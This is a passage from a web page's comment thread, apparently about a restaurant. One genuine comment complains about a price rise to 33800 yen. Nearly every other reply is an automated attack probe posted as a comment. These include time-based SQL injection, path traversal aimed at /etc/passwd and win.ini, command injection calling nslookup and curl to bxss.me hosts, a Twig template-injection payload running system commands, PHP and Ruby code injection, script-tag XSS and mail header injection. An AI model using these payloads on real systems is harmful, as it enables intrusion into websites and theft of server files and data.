http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
&nslookup hitomqktrhrev82d03.bxss.me&'\"`0&nslookup hitomqktrhrev82d03.bxss.me&`'
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
&(nslookup hitfrardjgzya5b877.bxss.me||perl -e "gethostbyname('hitfrardjgzya5b877.bxss.me')")&'\"`0&(nslookup hitfrardjgzya5b877.bxss.me||perl -e "gethostbyname('hitfrardjgzya5b877.bxss.me')")&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
"+"A".concat(70-3).concat(22*4).concat(113).concat(79).concat(119).concat(87)+(require"socket"
Socket.gethostbyname("hityh"+"dcjqsamc6e205.bxss.me.")[3].to_s)+"
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
bxss.me/t/xss.html?%00
re: guest
|(nslookup hitnpxdituqbye5ddc.bxss.me||perl -e "gethostbyname('hitnpxdituqbye5ddc.bxss.me')")
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
'+'A'.concat(70-3).concat(22*4).concat(114).concat(85).concat(108).concat(79)+(require'socket'
Socket.gethostbyname('hitrx'+'qxknmoyr76c0f.bxss.me.')[3].to_s)+'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
`(nslookup hitspoczffuli132b7.bxss.me||perl -e "gethostbyname('hitspoczffuli132b7.bxss.me')")`
re: guest
/etc/shells
re: guest
file:///etc/passwd
re: guest
;(nslookup hitcraumcbbof4c6cb.bxss.me||perl -e "gethostbyname('hitcraumcbbof4c6cb.bxss.me')")|(nslookup hitcraumcbbof4c6cb.bxss.me||perl -e "gethostbyname('hitcraumcbbof4c6cb.bxss.me')")&(nslookup hitcraumcbbof4c6cb.bxss.me||perl -e "gethostbyname('hitcraumcbbof4c6cb.bxss.me')")
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
c:/windows/win.ini
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
';print(md5(31337));$a='
re: guest
bxss.me
re: guest
/WEB-INF/web.xml
re: guest
";print(md5(31337));$a="
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
/../../../../../../../../../../boot.ini
re: guest
'.print(md5(31337)).'
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+463-463-1=0+0+0+1 --
re: guest
-1 OR 3+463-463-1=0+0+0+1 --
re: guest
-1 OR 2+723-723-1=0+0+0+1
re: guest
-1 OR 3+723-723-1=0+0+0+1
re: guest
-1' OR 2+481-481-1=0+0+0+1 --
re: guest
-1' OR 3+481-481-1=0+0+0+1 --
re: guest
-1' OR 2+831-831-1=0+0+0+1 or 'ZSXDpSHA'='
re: guest
-1' OR 3+831-831-1=0+0+0+1 or 'ZSXDpSHA'='
re: guest
-1" OR 2+178-178-1=0+0+0+1 --
re: guest
-1" OR 3+178-178-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
WKMkraJ1'; waitfor delay '0:0:15' --
re: guest
-5 OR 831=(SELECT 831 FROM PG_SLEEP(15))--
re: guest
-5) OR 990=(SELECT 990 FROM PG_SLEEP(15))--
re: guest
-1)) OR 156=(SELECT 156 FROM PG_SLEEP(15))--
re: guest
4oPjZWzQ' OR 491=(SELECT 491 FROM PG_SLEEP(15))--
re: guest
38I7mGgm') OR 532=(SELECT 532 FROM PG_SLEEP(15))--
re: guest
KVF0Z1BR')) OR 599=(SELECT 599 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@QFnce
re: guest
1LPI4VL8S0
re: guest
response.write(9191527*9434668)
re: guest
'+response.write(9191527*9434668)+'
re: guest
"+response.write(9191527*9434668)+"
re: guest
${9999279+9999459}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
echo cmikek$()\ izmuaj\nz^xyu||a #' &echo cmikek$()\ izmuaj\nz^xyu||a #|" &echo cmikek$()\ izmuaj\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: guest
&echo stpstd$()\ yyqcrh\nz^xyu||a #' &echo stpstd$()\ yyqcrh\nz^xyu||a #|" &echo stpstd$()\ yyqcrh\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitlw'.'bqkkbfave1998.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(87).chr(116).chr(69).'
re: guest
/etc/shells
re: guest
|echo vpofny$()\ vqsvlk\nz^xyu||a #' |echo vpofny$()\ vqsvlk\nz^xyu||a #|" |echo vpofny$()\ vqsvlk\nz^xyu||a #
re: guest
".gethostbyname(lc("hitbe"."guvedsbx95967.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(88).chr(108).chr(75)."
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
expr 9000538597 - 956505
re: guest
gethostbyname(lc('hitjq'.'kaefatfo10a60.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(69).chr(110).chr(90)
re: guest
c:/windows/win.ini
re: guest
(nslookup -q=cname hitxmtarcvzqh68f48.bxss.me||curl hitxmtarcvzqh68f48.bxss.me))
re: guest
bxss.me
re: guest
$(nslookup -q=cname hitxskkwkswxec3d95.bxss.me||curl hitxskkwkswxec3d95.bxss.me)
re: guest
Http://bxss.me/t/fit.txt
re: guest
&nslookup -q=cname hitffynsulsgc42089.bxss.me&'\"`0&nslookup -q=cname hitffynsulsgc42089.bxss.me&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
&(nslookup -q=cname hitjahadwuhoo07033.bxss.me||curl hitjahadwuhoo07033.bxss.me)&'\"`0&(nslookup -q=cname hitjahadwuhoo07033.bxss.me||curl hitjahadwuhoo07033.bxss.me)&`'
re: guest
|(nslookup -q=cname hitzkovurbpfd0bda0.bxss.me||curl hitzkovurbpfd0bda0.bxss.me)
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
`(nslookup -q=cname hitrixxggwzgy7942f.bxss.me||curl hitrixxggwzgy7942f.bxss.me)`
re: guest
';print(md5(31337));$a='
re: guest
bxss.me/t/xss.html?%00
re: guest
;(nslookup -q=cname hitshcwvdbihj90a3a.bxss.me||curl hitshcwvdbihj90a3a.bxss.me)|(nslookup -q=cname hitshcwvdbihj90a3a.bxss.me||curl hitshcwvdbihj90a3a.bxss.me)&(nslookup -q=cname hitshcwvdbihj90a3a.bxss.me||curl hitshcwvdbihj90a3a.bxss.me)
re: guest
";print(md5(31337));$a="
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitvzzjpzxncie9a82.bxss.me||curl${IFS}hitvzzjpzxncie9a82.bxss.me)
re: guest
${@print(md5(31337))}
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitwqrarvrqdx4617e.bxss.me||curl${IFS}hitwqrarvrqdx4617e.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwqrarvrqdx4617e.bxss.me||curl${IFS}hitwqrarvrqdx4617e.bxss.me)&`'
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
'"()
re: guest
"+"A".concat(70-3).concat(22*4).concat(100).concat(72).concat(97).concat(80)+(require"socket"
Socket.gethostbyname("hitfu"+"cxnpkxsk9deda.bxss.me.")[3].to_s)+"
re: guest
'&&sleep(27*1000)*rmjrrq&&'
re: guest
'+'A'.concat(70-3).concat(22*4).concat(105).concat(78).concat(102).concat(65)+(require'socket'
Socket.gethostbyname('hitgo'+'fianoxqv5f2f5.bxss.me.')[3].to_s)+'
re: guest
"&&sleep(27*1000)*yowreg&&"
re: guest
'A'.concat(70-3).concat(22*4).concat(101).concat(76).concat(103).concat(82)+(require'socket'
Socket.gethostbyname('hitjq'+'utqvvshk5de22.bxss.me.')[3].to_s)
re: guest
'||sleep(27*1000)*wfbupu||'
re: guest
"||sleep(27*1000)*cahxtx||"
re: guest
replies
re: guest
'"
re: guest
replies
re: guest
<!--
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >eFOV(9021)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitweazulhbfx52103.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >eFOV(9513)</ScRiPt>
re: guest
9525014
re: guest
SGQ0WWAy
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
CaXCo1f9'; waitfor delay '0:0:15' --
re: guest
-1 OR 27=(SELECT 27 FROM PG_SLEEP(15))--
re: guest
-1) OR 89=(SELECT 89 FROM PG_SLEEP(15))--
re: guest
-1)) OR 681=(SELECT 681 FROM PG_SLEEP(15))--
re: guest
fh199tzF' OR 286=(SELECT 286 FROM PG_SLEEP(15))--
re: guest
226eZDDJ') OR 43=(SELECT 43 FROM PG_SLEEP(15))--
re: guest
jwp8UCM1')) OR 507=(SELECT 507 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@ACsgn
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Thanks @thetokyogourmet for the update. (And our unknown guest for the map pin :p) What a bummer; the price at 33800 yen is already so high, so having it go up again while being of middling quality is rather unfortunate.
re: JJ
zUKAwO2g
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+168-168-1=0+0+0+1
re: JJ
-1 OR 3+168-168-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
6uFvHT9F'; waitfor delay '0:0:15' --
re: JJ
-5 OR 971=(SELECT 971 FROM PG_SLEEP(15))--
re: JJ
-5) OR 645=(SELECT 645 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 761=(SELECT 761 FROM PG_SLEEP(15))--
re: JJ
yE7J98u6' OR 481=(SELECT 481 FROM PG_SLEEP(15))--
re: JJ
vocimu2K') OR 529=(SELECT 529 FROM PG_SLEEP(15))--
re: JJ
k9IvvnHd')) OR 290=(SELECT 290 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@S1eIq
re: JJ
1BRymM2vsnO
re: JJ
response.write(9749910*9337271)
re: JJ
'+response.write(9749910*9337271)+'
re: JJ
%0abcc:074625.67-21966.67.ffa93.19990.2@bxss.me
re: JJ
"+response.write(9749910*9337271)+"
re: JJ
to@example.com>%0d%0abcc:074625.67-21967.67.ffa93.19990.2@bxss.me
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
${9999623+9999334}
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
../../../../../../../../../../../../../../../proc/version
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: JJ
../../../../../../../../../../etc/passwd%00.jpg
re: JJ
)
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: JJ
echo fgahnm$()\ nxwkfb\nz^xyu||a #' &echo fgahnm$()\ nxwkfb\nz^xyu||a #|" &echo fgahnm$()\ nxwkfb\nz^xyu||a #
re: JJ
!(()&&!|*|*|
re: JJ
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: JJ
&echo zclhnm$()\ tutfzr\nz^xyu||a #' &echo zclhnm$()\ tutfzr\nz^xyu||a #|" &echo zclhnm$()\ tutfzr\nz^xyu||a #
re: JJ
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: JJ
^(#$!@#$)(()))******
re: JJ
|echo yqdxsn$()\ mdbxfo\nz^xyu||a #' |echo yqdxsn$()\ mdbxfo\nz^xyu||a #|" |echo yqdxsn$()\ mdbxfo\nz^xyu||a #
re: JJ
/etc/passwd
re: JJ
(nslookup hitkzlmkczvru881f2.bxss.me||perl -e "gethostbyname('hitkzlmkczvru881f2.bxss.me')")
re: JJ
%2fetc%2fpasswd
re: JJ
$(nslookup hitmvqhpagzfk52640.bxss.me||perl -e "gethostbyname('hitmvqhpagzfk52640.bxss.me')")
re: JJ
'.gethostbyname(lc('hitzv'.'jizbiocl058ad.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(73).chr(108).chr(88).'
re: JJ
/.././.././.././.././.././.././.././../etc/./passwd%00
re: JJ
".gethostbyname(lc("hittj"."ixvshsad23e93.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(79).chr(110).chr(84)."
re: JJ
&nslookup hitvuxhwvkfoy42f23.bxss.me&'\"`0&nslookup hitvuxhwvkfoy42f23.bxss.me&`'
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: JJ
&(nslookup hitrdfzndorfb935ac.bxss.me||perl -e "gethostbyname('hitrdfzndorfb935ac.bxss.me')")&'\"`0&(nslookup hitrdfzndorfb935ac.bxss.me||perl -e "gethostbyname('hitrdfzndorfb935ac.bxss.me')")&`'
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: JJ
|(nslookup hitmowuepurtm21bc5.bxss.me||perl -e "gethostbyname('hitmowuepurtm21bc5.bxss.me')")
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: JJ
`(nslookup hitikukrqttzrbc4f9.bxss.me||perl -e "gethostbyname('hitikukrqttzrbc4f9.bxss.me')")`
re: JJ
http://bxss.me/t/fit.txt%3F.jpg
re: JJ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: JJ
;(nslookup hitxykqrzcied29399.bxss.me||perl -e "gethostbyname('hitxykqrzcied29399.bxss.me')")|(nslookup hitxykqrzcied29399.bxss.me||perl -e "gethostbyname('hitxykqrzcied29399.bxss.me')")&(nslookup hitxykqrzcied29399.bxss.me||perl -e "gethostbyname('hitxykqrzcied29399.bxss.me')")
re: JJ
/etc/shells
re: JJ
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.